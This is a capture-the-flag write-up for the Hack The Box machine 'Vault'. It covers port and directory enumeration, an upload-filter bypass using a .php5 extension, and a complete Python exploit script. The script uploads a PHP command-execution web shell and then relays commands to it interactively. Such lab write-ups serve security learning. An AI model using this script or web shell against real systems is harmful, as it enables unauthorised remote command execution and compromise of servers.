[HTB] Vault

Foothold discovery

1. Attacker discover the 80 port during the nmap scan:

nmap -p- -sV 10.129.87.172

1. Attacker enter the :80 port

1. Attacker discovers the /sparklays endpoint based on the information that the page contains

1. Since the access is forbidden attacker decide to enumerate the enpoint in order to find out if some endpoints are accessible to unauthorized user

File enumeration:

gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-files.txt -u http://10.129.87.172/sparklays/

Discovered endpoints:

/login.php /admin.php

Folder enumeration:

gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.129.87.172/sparklays/

Discovered folders:

/design

File enumeration inside found folder:

gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-files.txt -u http://10.129.87.172/sparklays/design

Discovered endpoints:

/design/changelogo.php

Folder enumeration inside found folder:

gobuster dir -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://10.129.87.172/sparklays/design

Discovered folders:

/design/uploads

1. Attacker go to discovered /design/changelogo.php endpoint.

1. Attacker upload the webshell with extension validation bypass (file with .php5 extension instead of .php)

1. Attacker enter the uploaded webshell

Foothold flow

1. Attacker enter the http://<IP>/sparklays/design/changelogo.php subpage

2. Attacker upload the webshell with .php5 extension

3. Attacker enter the webshell

Exploit written by me:

# Usage: python3 exploit.py <VICTIM_IP> <LOCAL_IP> <SHELL_LISTENER>
import requests
import sys
import time
import random
import socket

# Getting the information from attacker
ip = ""
local_ip = ""
port = ""

try:
    ip = sys.argv[1]
    local_ip = sys.argv[2]
    port = sys.argv[3]
except:
    print("Usage: python3 exploit.py <VICTIM_IP> <LOCAL_IP> <SHELL_LISTENER>")
    sys.exit()

print("Attacking the target " + ip + ".")
time.sleep(1)
print("Setting up the listener on port " + port + ".")
time.sleep(1)

##### Uploading the webshell #####

# Configure proxies to route traffic through Burp Suite
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

# Prepare temporary file for upload
file_contents = "<?php system($_REQUEST['cmd']); ?>"
file_name = "shell" + str(random.randint(1000000,1999999)) + ".php5"

# Generate a custom boundary and add it to header
boundary = "----WebKitFormBoundaryOLFubEqWo3Dfnb5f"
headers = {
    "Content-Type": f"multipart/form-data; boundary={boundary}"
}

# Specify the url
url = "http://" + ip + "/sparklays/design/changelogo.php"

# Create the request body
body = (
    f"--{boundary}\r\n"
    f"Content-Disposition: form-data; name=\"file\"; filename=\"{file_name}\"\r\n"
    f"Content-Type: application/x-php\r\n\r\n"
    f"{file_contents}\r\n"
    f"--{boundary}\r\n"
    f"Content-Disposition: form-data; name=\"submit\"\r\n\r\n"
    f"upload file\r\n"
    f"--{boundary}\r\n"
)

x = requests.post(url, body, proxies=proxies,headers=headers)

print("File " + file_name + " uploaded.")

##### Entering the webshell #####
while True:
    payload = input("Shell> ")
    attack_url = "http://" + ip + "/sparklays/design/uploads/" + file_name + "?cmd=" + payload
    response = requests.get(attack_url, proxies=proxies)
    print(response.text)